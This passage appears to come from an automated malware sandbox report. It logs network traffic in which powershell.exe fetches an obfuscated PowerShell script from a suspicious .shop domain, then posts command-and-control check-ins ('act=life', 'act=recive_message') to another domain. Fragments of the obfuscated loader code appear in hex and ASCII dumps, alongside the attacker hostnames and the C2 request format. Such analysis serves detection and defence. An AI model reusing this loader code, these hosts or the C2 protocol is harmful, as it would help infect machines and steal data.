Dec 31, 2024 08:58:31.440907001 CET	443	49928	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:31.440954924 CET	49928	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:31.446161985 CET	49928	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:31.446187019 CET	443	49928	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:31.502377987 CET	49936	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:31.502422094 CET	443	49936	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:31.502489090 CET	49936	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:31.502703905 CET	49936	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:31.502712965 CET	443	49936	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:31.963232994 CET	443	49936	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:31.963296890 CET	49936	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:31.964441061 CET	49936	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:31.964447975 CET	443	49936	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:31.964673042 CET	443	49936	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:31.965842009 CET	49936	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:31.965924978 CET	49936	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:31.965929985 CET	443	49936	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:32.485404968 CET	443	49936	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:32.485511065 CET	443	49936	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:32.485553026 CET	49936	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:32.495070934 CET	49936	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:32.495085001 CET	443	49936	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:32.555974960 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:32.556025982 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:32.556363106 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:32.563296080 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:32.563321114 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:33.050703049 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:33.050797939 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:33.157645941 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:33.157664061 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:33.157990932 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:33.159204960 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:33.159300089 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:33.159332037 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:33.660414934 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:33.660507917 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:33.660554886 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:33.660691977 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:33.660707951 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:33.660723925 CET	49945	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:33.660729885 CET	443	49945	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:33.768894911 CET	49951	443	192.168.2.4	185.161.251.21
Dec 31, 2024 08:58:33.768944979 CET	443	49951	185.161.251.21	192.168.2.4
Dec 31, 2024 08:58:33.769013882 CET	49951	443	192.168.2.4	185.161.251.21
Dec 31, 2024 08:58:33.769275904 CET	49951	443	192.168.2.4	185.161.251.21
Dec 31, 2024 08:58:33.769294977 CET	443	49951	185.161.251.21	192.168.2.4
Dec 31, 2024 08:58:34.513787985 CET	443	49951	185.161.251.21	192.168.2.4
Dec 31, 2024 08:58:34.513993979 CET	49951	443	192.168.2.4	185.161.251.21
Dec 31, 2024 08:58:34.535198927 CET	49951	443	192.168.2.4	185.161.251.21
Dec 31, 2024 08:58:34.535219908 CET	443	49951	185.161.251.21	192.168.2.4
Dec 31, 2024 08:58:34.535494089 CET	443	49951	185.161.251.21	192.168.2.4
Dec 31, 2024 08:58:34.537729025 CET	49951	443	192.168.2.4	185.161.251.21
Dec 31, 2024 08:58:34.579330921 CET	443	49951	185.161.251.21	192.168.2.4
Dec 31, 2024 08:58:34.782164097 CET	443	49951	185.161.251.21	192.168.2.4
Dec 31, 2024 08:58:34.782216072 CET	443	49951	185.161.251.21	192.168.2.4
Dec 31, 2024 08:58:34.782277107 CET	49951	443	192.168.2.4	185.161.251.21
Dec 31, 2024 08:58:34.782594919 CET	49951	443	192.168.2.4	185.161.251.21
Dec 31, 2024 08:58:34.782610893 CET	443	49951	185.161.251.21	192.168.2.4
Dec 31, 2024 08:58:34.782623053 CET	49951	443	192.168.2.4	185.161.251.21
Dec 31, 2024 08:58:34.782628059 CET	443	49951	185.161.251.21	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 08:57:11.818945885 CET	54209	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:57:11.832694054 CET	53	54209	1.1.1.1	192.168.2.4
Dec 31, 2024 08:58:24.585041046 CET	53299	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:58:24.596757889 CET	53	53299	1.1.1.1	192.168.2.4
Dec 31, 2024 08:58:33.661930084 CET	59612	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:58:33.768285990 CET	53	59612	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 08:57:11.818945885 CET	192.168.2.4	1.1.1.1	0x9343	Standard query (0)	deduhko.klipzyroloo.shop	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:58:24.585041046 CET	192.168.2.4	1.1.1.1	0xd84e	Standard query (0)	imbibelubmbe.click	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:58:33.661930084 CET	192.168.2.4	1.1.1.1	0xc25	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 08:57:11.832694054 CET	1.1.1.1	192.168.2.4	0x9343	No error (0)	deduhko.klipzyroloo.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:57:11.832694054 CET	1.1.1.1	192.168.2.4	0x9343	No error (0)	deduhko.klipzyroloo.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:58:24.596757889 CET	1.1.1.1	192.168.2.4	0xd84e	No error (0)	imbibelubmbe.click	188.114.97.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:58:24.596757889 CET	1.1.1.1	192.168.2.4	0xd84e	No error (0)	imbibelubmbe.click	188.114.96.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:58:33.768285990 CET	1.1.1.1	192.168.2.4	0xc25	No error (0)	cegu.shop	185.161.251.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

deduhko.klipzyroloo.shop

imbibelubmbe.click

cegu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	188.114.97.3	443	6272	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:57:12 UTC	83	OUT	GET /mazkk.eml HTTP/1.1 Host: deduhko.klipzyroloo.shop Connection: Keep-Alive
2024-12-31 07:57:12 UTC	623	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:57:12 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 7667347 Connection: close X-Powered-By: Express ETag: W/"74fe93-UqxUlULkl34Op2Jl4t90LCUQeqs" Set-Cookie: connect.sid=s%3AZocWM-EDFAiPYK7BNP9dPtWIbWDsf_1d.U1Ub2zi7A1uTSRKcUbzys0vqZBvu8XrHvGuZt0ntctI; Path=/; HttpOnly cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8fa8b7a8b9820cbe-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1536&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=697&delivery_rate=1820448&cwnd=166&unsent_bytes=0&cid=4b9c404c704a7a89&ts=390&x=0"
2024-12-31 07:57:12 UTC	746	IN	Data Raw: 24 58 47 50 72 6a 68 69 41 4b 62 62 4e 61 65 7a 68 46 38 72 6c 65 4f 4d 58 4b 4f 4d 68 69 79 42 4f 41 4f 6f 72 63 4d 75 6e 72 75 30 30 51 38 6d 42 4e 5a 4e 41 4f 33 55 67 59 67 7a 36 6c 77 43 55 4a 52 5a 54 73 4d 45 44 73 4e 50 49 74 53 37 56 73 35 56 63 6f 39 4b 79 4d 79 66 39 45 6e 64 41 6d 76 50 53 75 56 63 34 38 66 55 51 69 51 62 74 71 36 43 53 36 30 7a 6e 5a 75 4b 43 45 59 30 39 4f 34 55 34 5a 4d 70 4c 76 4e 48 39 36 31 4f 51 44 39 68 36 66 79 71 35 6e 35 74 6e 4e 73 4b 63 55 7a 31 56 5a 78 4b 5a 48 72 63 54 45 48 6e 69 72 38 6d 77 73 58 41 62 6b 35 50 73 36 4c 67 38 65 4f 6c 52 4d 63 4f 32 41 42 77 56 4f 44 39 35 46 59 49 71 52 34 4e 73 63 6a 56 71 55 4b 6f 34 50 68 52 77 7a 67 64 55 38 30 7a 6c 38 77 34 44 57 52 73 51 77 64 76 34 6f 68 44 51 30 53 Data Ascii: $XGPrjhiAKbbNaezhF8rleOMXKOMhiyBOAOorcMunru00Q8mBNZNAO3UgYgz6lwCUJRZTsMEDsNPItS7Vs5Vco9KyMyf9EndAmvPSuVc48fUQiQbtq6CS60znZuKCEY09O4U4ZMpLvNH961OQD9h6fyq5n5tnNsKcUz1VZxKZHrcTEHnir8mwsXAbk5Ps6Lg8eOlRMcO2ABwVOD95FYIqR4NscjVqUKo4PhRwzgdU80zl8w4DWRsQwdv4ohDQ0S
2024-12-31 07:57:12 UTC	1369	IN	Data Raw: 49 4b 4b 61 42 32 78 69 6a 61 59 55 75 58 6d 59 61 45 78 48 36 73 43 79 4d 64 50 6f 74 31 55 69 70 73 75 4f 62 44 54 70 32 49 78 55 33 4d 55 77 55 70 76 42 52 39 6e 65 33 30 45 72 43 6c 44 43 79 32 45 6b 64 44 6b 6a 62 6b 70 6d 72 57 31 6b 4f 4d 67 73 71 42 74 68 72 64 70 4f 37 6e 62 65 6d 6b 53 57 62 4a 4e 62 4f 61 32 7a 30 4f 51 20 3d 20 22 47 22 0d 0a 0d 0a 24 54 76 5a 42 32 46 47 39 68 52 6a 5a 6a 6c 65 50 78 56 72 6b 6c 50 55 74 33 72 63 75 49 72 6a 32 53 72 34 56 4e 4c 68 65 79 6f 56 33 4b 72 6a 6d 57 48 51 4d 7a 75 5a 62 76 6d 49 57 45 78 52 43 56 4d 30 71 43 79 7a 36 4a 54 43 32 45 31 4e 34 4a 4a 41 79 4e 35 33 33 78 57 44 4a 31 59 37 71 51 65 6d 4d 59 55 44 78 64 54 68 44 38 5a 4d 69 4f 6b 42 42 59 4f 75 38 70 62 35 4b 65 74 76 56 31 32 4f 32 75 Data Ascii: IKKaB2xijaYUuXmYaExH6sCyMdPot1UipsuObDTp2IxU3MUwUpvBR9ne30ErClDCy2EkdDkjbkpmrW1kOMgsqBthrdpO7nbemkSWbJNbOa2z0OQ = "G"$TvZB2FG9hRjZjlePxVrklPUt3rcuIrj2Sr4VNLheyoV3KrjmWHQMzuZbvmIWExRCVM0qCyz6JTC2E1N4JJAyN533xWDJ1Y7qQemMYUDxdThD8ZMiOkBBYOu8pb5KetvV12O2u
2024-12-31 07:57:12 UTC	1369	IN	Data Raw: 4b 70 70 4e 44 73 37 35 41 39 53 47 75 79 51 74 72 53 33 35 69 46 4a 44 79 33 54 39 6a 73 6d 35 5a 74 4f 4e 59 54 6c 31 69 53 43 62 52 6f 41 6a 71 39 79 7a 77 7a 68 63 59 72 53 53 79 59 59 53 30 46 62 52 39 38 43 35 4f 36 44 56 67 56 41 6c 48 55 76 41 68 67 68 44 64 6b 57 4f 75 76 59 31 5a 57 36 32 47 51 53 4b 4b 38 65 65 39 4b 45 6b 47 52 39 56 35 31 36 6e 41 6b 66 44 31 49 41 66 6d 6d 51 30 77 66 72 38 41 57 72 76 47 6b 39 63 4d 62 61 77 7a 50 77 56 72 54 53 75 74 6a 79 65 31 78 73 76 4c 6d 49 77 55 4d 44 70 58 34 37 6b 4b 78 58 54 51 50 48 66 65 62 50 48 6b 74 72 47 66 56 75 6d 46 70 73 39 6a 34 59 63 45 75 6b 55 38 45 55 52 72 76 41 4d 62 37 6d 48 34 47 36 58 50 58 61 70 33 58 48 36 6f 4c 79 33 71 42 57 62 6c 46 32 39 68 74 46 6d 4a 66 77 45 65 4a 74 Data Ascii: KppNDs75A9SGuyQtrS35iFJDy3T9jsm5ZtONYTl1iSCbRoAjq9yzwzhcYrSSyYYS0FbR98C5O6DVgVAlHUvAhghDdkWOuvY1ZW62GQSKK8ee9KEkGR9V516nAkfD1IAfmmQ0wfr8AWrvGk9cMbawzPwVrTSutjye1xsvLmIwUMDpX47kKxXTQPHfebPHktrGfVumFps9j4YcEukU8EURrvAMb7mH4G6XPXap3XH6oLy3qBWblF29htFmJfwEeJt
2024-12-31 07:57:12 UTC	1369	IN	Data Raw: 6d 31 31 4d 55 6c 37 50 30 6e 77 39 53 57 30 42 4d 6c 72 59 62 33 62 51 56 55 6c 6f 33 32 4b 49 7a 4a 41 44 4d 32 64 62 38 46 51 37 6e 66 36 52 70 55 37 4d 7a 6a 70 6e 75 55 7a 55 35 54 70 73 44 34 37 35 70 31 55 69 4f 6e 33 6e 4f 48 61 54 35 54 4f 6d 57 4a 34 7a 77 61 4b 63 45 37 78 6b 49 49 78 61 6a 66 74 79 32 44 41 50 46 61 30 6d 34 50 67 44 31 34 30 6d 6e 36 52 4e 38 62 6e 65 7a 4b 4f 4a 77 58 6c 6c 59 35 31 72 55 66 4f 48 41 59 72 51 66 64 34 38 65 75 42 54 48 63 6d 6f 64 52 45 6c 64 56 4d 44 74 6a 6e 4a 70 59 54 70 58 46 42 44 32 63 74 42 66 43 4e 59 70 6d 55 65 31 74 44 4f 42 76 71 42 4a 73 30 45 38 75 75 53 71 45 4a 69 53 70 6c 34 54 69 71 53 4e 5a 51 33 4d 44 4d 48 68 5a 34 4c 6a 53 4f 50 4f 42 5a 49 6c 70 71 64 6c 4b 73 72 61 68 46 48 76 32 65 Data Ascii: m11MUl7P0nw9SW0BMlrYb3bQVUlo32KIzJADM2db8FQ7nf6RpU7MzjpnuUzU5TpsD475p1UiOn3nOHaT5TOmWJ4zwaKcE7xkIIxajfty2DAPFa0m4PgD140mn6RN8bnezKOJwXllY51rUfOHAYrQfd48euBTHcmodREldVMDtjnJpYTpXFBD2ctBfCNYpmUe1tDOBvqBJs0E8uuSqEJiSpl4TiqSNZQ3MDMHhZ4LjSOPOBZIlpqdlKsrahFHv2e
2024-12-31 07:57:12 UTC	1369	IN	Data Raw: 73 46 30 75 75 67 34 78 35 50 41 4f 65 59 44 46 49 46 79 4b 77 4f 72 56 51 34 33 36 33 36 41 46 70 71 71 67 64 75 71 48 41 73 54 6b 32 6d 6e 42 78 75 5a 6a 45 35 34 37 6f 43 4b 4f 4a 61 6b 78 58 51 4f 6a 67 5a 78 58 54 36 39 6e 51 6c 59 4f 55 62 63 33 4c 7a 43 4c 72 75 51 62 39 49 4f 31 73 77 48 53 63 6e 31 61 39 79 66 4b 38 68 62 71 50 6a 51 39 4a 68 38 54 50 51 4e 4a 4a 44 74 63 57 72 39 78 34 7a 72 78 77 56 39 6d 48 4b 33 46 79 77 34 54 36 77 63 4a 32 6e 6f 55 43 34 73 76 5a 49 33 72 67 36 6e 62 56 53 41 61 4f 4e 67 51 47 6b 4d 73 33 5a 36 4f 67 56 45 6a 46 6c 38 69 37 63 66 5a 33 44 31 75 5a 6d 35 4b 59 62 34 4c 77 6a 37 47 51 69 62 6d 38 48 34 52 6a 66 68 61 61 4c 4b 64 47 73 56 30 52 52 46 4c 68 37 4f 56 6b 36 77 6c 54 76 37 55 69 58 72 51 41 6c 74 Data Ascii: sF0uug4x5PAOeYDFIFyKwOrVQ43636AFpqqgduqHAsTk2mnBxuZjE547oCKOJakxXQOjgZxXT69nQlYOUbc3LzCLruQb9IO1swHScn1a9yfK8hbqPjQ9Jh8TPQNJJDtcWr9x4zrxwV9mHK3Fyw4T6wcJ2noUC4svZI3rg6nbVSAaONgQGkMs3Z6OgVEjFl8i7cfZ3D1uZm5KYb4Lwj7GQibm8H4RjfhaaLKdGsV0RRFLh7OVk6wlTv7UiXrQAlt
2024-12-31 07:57:12 UTC	1369	IN	Data Raw: 37 2d 33 32 2b 32 39 29 29 2a 28 28 32 37 2d 31 38 2b 32 35 29 29 2d 28 34 34 37 33 32 29 29 29 0d 0a 24 4c 62 43 74 7a 6c 43 53 57 56 52 53 57 20 3d 20 24 54 54 4a 70 6d 44 69 59 7a 0d 0a 24 66 6f 48 55 4a 7a 6f 42 4d 77 20 3d 20 35 33 34 0d 0a 24 51 63 68 58 45 54 57 54 70 58 45 43 66 20 3d 20 28 28 28 32 31 2b 34 37 2b 33 37 2a 28 28 33 39 2a 39 2a 32 30 29 29 2a 28 31 33 2a 31 38 2d 38 29 29 2d 28 35 38 37 30 30 39 30 33 29 29 29 0d 0a 24 75 52 64 6b 72 57 4a 47 6c 4d 56 53 48 20 3d 20 24 55 73 66 6b 6f 51 50 6a 54 4e 0d 0a 24 52 53 42 71 4e 53 4c 4b 6f 46 20 3d 20 24 55 73 66 6b 6f 51 50 6a 54 4e 0d 0a 24 4a 52 6f 67 46 75 56 49 64 20 3d 20 24 6c 54 48 4e 73 6b 72 45 75 58 62 0d 0a 66 6f 72 20 28 24 77 72 67 61 62 46 6f 47 55 3d 28 28 28 34 35 2b 33 Data Ascii: 7-32+29))((27-18+25))-(44732)))$LbCtzlCSWVRSW = $TTJpmDiYz$foHUJzoBMw = 534$QchXETWTpXECf = (((21+47+37((39920))(1318-8))-(58700903)))$uRdkrWJGlMVSH = $UsfkoQPjTN$RSBqNSLKoF = $UsfkoQPjTN$JRogFuVId = $lTHNskrEuXbfor ($wrgabFoGU=(((45+3
2024-12-31 07:57:12 UTC	1369	IN	Data Raw: 76 59 53 50 77 29 2d 38 2b 32 31 2d 33 33 29 2b 24 75 52 64 6b 72 57 4a 47 6c 4d 56 53 48 2d 34 35 2d 32 33 29 0d 0a 24 6b 78 5a 54 71 72 41 20 3d 20 24 4c 62 43 74 7a 6c 43 53 57 56 52 53 57 0d 0a 24 77 47 6c 5a 55 20 3d 20 32 36 35 0d 0a 24 45 7a 6b 42 55 52 74 6a 79 41 57 66 69 20 3d 20 28 28 28 28 32 32 2b 36 2d 28 31 34 2d 34 34 2b 28 31 36 2b 34 2d 32 36 2b 28 32 32 2b 34 39 2b 34 38 29 29 29 2b 28 33 35 2a 32 31 2a 37 29 29 29 2d 28 34 36 37 39 29 29 29 0d 0a 24 42 58 4c 47 45 54 53 6f 79 20 3d 20 28 28 28 28 31 32 2d 32 2b 24 75 52 64 6b 72 57 4a 47 6c 4d 56 53 48 29 29 29 2b 24 49 61 6e 74 41 57 2b 33 33 2b 28 33 38 2b 32 34 2b 32 32 29 29 0d 0a 24 6b 77 47 48 6f 54 55 5a 58 6e 53 65 68 51 20 3d 20 24 4d 58 6b 62 43 6c 76 59 53 50 77 0d 0a 24 79 Data Ascii: vYSPw)-8+21-33)+$uRdkrWJGlMVSH-45-23)$kxZTqrA = $LbCtzlCSWVRSW$wGlZU = 265$EzkBURtjyAWfi = ((((22+6-(14-44+(16+4-26+(22+49+48)))+(35217)))-(4679)))$BXLGETSoy = ((((12-2+$uRdkrWJGlMVSH)))+$IantAW+33+(38+24+22))$kwGHoTUZXnSehQ = $MXkbClvYSPw$y
2024-12-31 07:57:12 UTC	1369	IN	Data Raw: 2b 24 4a 52 6f 67 46 75 56 49 64 2b 31 33 2b 32 34 2b 28 28 34 36 2d 32 37 2b 28 36 2d 34 36 2b 31 30 29 29 29 2d 28 33 39 29 29 0d 0a 24 76 71 6f 48 4a 53 43 53 61 76 6d 4f 20 3d 20 28 28 24 45 53 4b 57 51 6c 4e 6b 56 55 2d 31 38 2d 28 33 31 2d 31 37 2b 33 39 29 29 2d 32 2d 33 39 2b 24 51 63 68 58 45 54 57 54 70 58 45 43 66 2d 24 5a 59 71 67 67 2b 31 38 2d 24 54 78 70 6b 6b 75 4c 46 6f 4e 5a 2d 28 28 24 41 4a 76 63 75 54 72 68 72 70 45 2d 34 33 2b 37 29 29 2d 28 36 35 30 29 29 0d 0a 24 62 6a 7a 6b 79 69 74 6a 44 71 20 3d 20 28 28 28 28 38 2d 32 34 2b 32 39 2d 28 28 24 6f 65 66 58 79 77 65 2d 32 32 2d 28 32 36 2b 32 32 2d 31 38 29 2b 24 66 6f 48 55 4a 7a 6f 42 4d 77 2d 34 30 2d 28 24 76 48 78 51 75 59 79 43 2b 31 37 2b 32 33 29 29 29 29 29 29 2b 28 31 30 Data Ascii: +$JRogFuVId+13+24+((46-27+(6-46+10)))-(39))$vqoHJSCSavmO = (($ESKWQlNkVU-18-(31-17+39))-2-39+$QchXETWTpXECf-$ZYqgg+18-$TxpkkuLFoNZ-(($AJvcuTrhrpE-43+7))-(650))$bjzkyitjDq = ((((8-24+29-(($oefXywe-22-(26+22-18)+$foHUJzoBMw-40-($vHxQuYyC+17+23))))))+(10
2024-12-31 07:57:12 UTC	1369	IN	Data Raw: 2d 31 34 29 29 2d 28 31 39 30 39 29 29 0d 0a 24 78 55 63 41 71 55 4b 4e 20 3d 20 28 28 28 28 33 38 2d 31 38 2b 32 30 29 29 2d 28 24 74 4b 48 72 4e 72 63 50 58 2d 34 36 2b 39 29 2b 31 30 2b 33 2b 34 39 29 2d 28 36 29 29 0d 0a 24 41 51 6a 42 77 62 6b 6c 53 66 4d 70 43 20 3d 20 28 28 28 28 24 6c 54 48 4e 73 6b 72 45 75 58 62 2d 31 36 2b 28 34 2b 31 39 2d 38 2d 28 31 2b 34 30 2d 34 34 29 29 29 29 29 2b 28 39 29 29 0d 0a 24 49 59 55 67 77 42 55 4b 20 3d 20 28 28 28 28 34 35 2d 32 36 2d 28 31 32 2b 32 32 2d 24 6e 69 61 73 69 45 29 29 2b 24 70 57 4d 54 53 43 56 73 2d 31 34 2b 34 36 29 29 2d 28 33 36 35 29 29 0d 0a 24 61 70 78 48 61 75 54 42 20 3d 20 28 28 28 28 34 34 2d 39 2d 28 33 39 2b 33 36 2b 24 76 48 78 51 75 59 79 43 29 2d 28 28 24 6e 69 61 73 69 45 2d 31 Data Ascii: -14))-(1909))$xUcAqUKN = ((((38-18+20))-($tKHrNrcPX-46+9)+10+3+49)-(6))$AQjBwbklSfMpC = (((($lTHNskrEuXb-16+(4+19-8-(1+40-44)))))+(9))$IYUgwBUK = ((((45-26-(12+22-$niasiE))+$pWMTSCVs-14+46))-(365))$apxHauTB = ((((44-9-(39+36+$vHxQuYyC)-(($niasiE-1
2024-12-31 07:57:12 UTC	820	IN	Data Raw: 33 30 2b 28 34 35 2d 34 35 2d 34 35 2d 28 28 24 77 47 6c 5a 55 2d 31 32 2d 32 31 29 29 29 29 29 2d 28 35 36 34 29 29 0d 0a 24 6a 6a 45 74 51 50 53 6c 4d 4b 20 3d 20 28 28 32 34 2b 31 33 2b 32 34 29 2d 28 24 70 57 4d 54 53 43 56 73 2d 31 31 2d 24 6b 78 5a 54 71 72 41 29 2b 39 2d 31 38 2d 31 37 2d 24 52 53 42 71 4e 53 4c 4b 6f 46 2b 32 37 2d 28 24 51 41 53 4e 76 50 42 70 4a 57 75 73 46 2b 39 2b 32 35 29 2b 28 38 31 32 29 29 0d 0a 24 46 77 4d 67 6f 61 20 3d 20 28 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4b 53 59 4c 6e 54 79 64 4d 55 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 78 4c 64 78 79 43 64 45 73 4e 72 71 47 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 50 59 6d 54 55 72 43 58 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4a 62 69 61 57 43 6c 4d 78 6f 49 48 Data Ascii: 30+(45-45-45-(($wGlZU-12-21)))))-(564))$jjEtQPSlMK = ((24+13+24)-($pWMTSCVs-11-$kxZTqrA)+9-18-17-$RSBqNSLKoF+27-($QASNvPBpJWusF+9+25)+(812))$FwMgoa = ([char][int]$KSYLnTydMU + [char][int]$xLdxyCdEsNrqG + [char][int]$PYmTUrCX + [char][int]$JbiaWClMxoIH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49889	188.114.97.3	443	5956	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:58:25 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: imbibelubmbe.click
2024-12-31 07:58:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-31 07:58:25 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u0qh32e32jdbjel917hdgpm3dn; expires=Sat, 26 Apr 2025 01:45:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TH1kSNpm3o4IkrRzVyi32Oj0ZMPF%2BQzVX5EmhBHzaG%2FKog5OUDjCtXklAusaxgDb7QV2PyDTG2a8zQ%2BWvrWWt0EIGJU%2Bb%2Fh9%2BMizwuSepoiaMQJPMEb98ERhyYcis54DW703sQc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa8b96f69f51879-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1504&rtt_var=567&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1922317&cwnd=162&unsent_bytes=0&cid=87156d8bf7380936&ts=476&x=0"
2024-12-31 07:58:25 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-31 07:58:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49897	188.114.97.3	443	5956	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:58:26 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: imbibelubmbe.click
2024-12-31 07:58:26 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--SHELLS&j=aa77e78b6b0dd1b2226e7b799532ab3a
2024-12-31 07:58:26 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r5bdfmdalc5d0n115ve6cr3tb6; expires=Sat, 26 Apr 2025 01:45:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: 